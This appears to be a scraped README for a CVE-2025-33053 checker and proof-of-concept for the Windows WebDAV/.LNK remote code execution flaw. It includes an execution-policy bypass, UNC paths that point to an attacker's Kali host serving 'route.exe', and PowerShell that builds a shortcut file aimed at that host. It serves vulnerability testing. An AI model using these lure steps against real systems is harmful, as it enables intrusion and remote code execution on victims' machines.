Share
## https://sploitus.com/exploit?id=157B2D55-FDF3-55DD-96B9-D6A80DB087D7
# CVE-2025-33053 Vulnerability Checker & Proof-of-Concept (PoC)

![Checker Proof](misc/Checker_Proof.png)
Checker Proof

![PoC Proof](misc/PoC_proof.png)
PoC Proof

A complete set of tools to check and demonstrate potential exploitation of **CVE-2025-33053**, a critical WebDAV-based Remote Code Execution (RCE) vulnerability affecting Windows systems.

---

## ๐Ÿ“Œ About CVE-2025-33053

**CVE-2025-33053** allows attackers to exploit `.LNK` shortcut files that reference malicious remote WebDAV shares, potentially leading to Remote Code Execution (RCE) on affected systems.

### Vulnerability Conditions:
- **WebClient service** must be installed and running on the target.
- The target OS must **resolve UNC paths over WebDAV** when such paths are accessed โ€” even via `.LNK` files.

---

## ๐Ÿ” How Does the Vulnerability Work?

1. **Crafted `.LNK` File or Direct UNC Path Access** โ€” Points to a remote UNC path like:  
2. When the `.LNK` is accessed or the UNC path is manually browsed (e.g., via File Explorer): - The **WebClient service** initiates communication to the remote UNC location via WebDAV. - The system sends a **PROPFIND** request to query metadata from the attacker's server.
3. Upon receiving the PROPFIND request, the attacker can confirm that: - The target system resolves UNC paths via WebDAV. - The system is potentially vulnerable to **CVE-2025-33053**.

---

## โœ… Real-Time Vulnerability Checker (`CVE-2025-33053_checker.ps1`)

### What It Does:

| Check                                | Purpose                                                          |
|-------------------------------------|------------------------------------------------------------------|
| ๐Ÿ” **WebClient Service Status**      | Confirms if WebDAV support is active and running.                |
| ๐Ÿ” **UNC Path Handling via Test-Path**| Tests if the system resolves remote WebDAV UNC paths (key precondition for CVE exploitation). |



### How to Run:

1. **Open PowerShell as Administrator.**

2. If script execution is restricted, run:

```powershell
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
```

3. Run the checker: .\CVE-2025-33053_checker.ps1

---

## โš™๏ธ Proof-of-Concept (PoC) Server (CVE-2025-33053_PoC.py)
What It Does:
- Sets up a Python-based WebDAV-like server on the attacker's machine.
- Captures incoming PROPFIND requests when the victim system resolves the malicious UNC path.
- Displays in the terminal that the system reached out โ€” proving exploitation possibility.
Note: Tested in VM.

Usage:
1. On the attacker's (Kali) machine:
```bash
python3 CVE-2025-33053_PoC.py --port 8000
```

2. On the target machine:
- Open the UNC path directly in File Explorer:
```FilePath
\\<Kali-IP>@8000\DavWWWRoot\route.exe
```

- Manually create a .LNK file in Windows or simply navigate to:
```css
\\<Kali-IP>@8000\DavWWWRoot\route.exe
```

- Example PowerShell method to create a shortcut file:
```powershell
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut("C:\Users\Public\CVE-2025-33053-Test.lnk")
$Shortcut.TargetPath = "\\<Kali-IP>@8000\DavWWWRoot\route.exe"
$Shortcut.Save()
```

3. If the target is vulnerable the PoC server will log:
```css
[!] PROPFIND request received from <victim-ip> - Potential CVE-2025-33053 detected!
[!] Target system is VULNERABLE to CVE-2025-33053!
```

---

## ๐Ÿ” Why This PoC is Legitimate and Reliable:
โœ”๏ธ Uses real UNC path resolution โ€” no simulation.
โœ”๏ธ Captures actual PROPFIND requests triggered by the OS โ€” exact behavior required for CVE exploitation.
โœ”๏ธ Demonstrates real network-level evidence of vulnerability, without executing payloads or causing harm.

---

## ๐Ÿšง Important Notes
This PoC does not exploit or harm the target system โ€” it only detects the underlying vulnerable behavior.
Intended for use in controlled environments or with explicit authorization.
Demonstrates real system behavior โ€” not a mock simulation.
**To be used for educational purposes only. Do not run in unauthorised systems.**

---

## ๐Ÿท๏ธ License
MIT License โ€” Free for educational, research, and defensive purposes only.

---

## ๐Ÿค Contributing
Pull Requests welcome โ€” improve detection, add features, or suggest fixes.

---

## โš ๏ธ Disclaimer
This repository is **for educational and authorized security research only.**
Misuse against systems you do not own or have permission to test is strictly forbidden.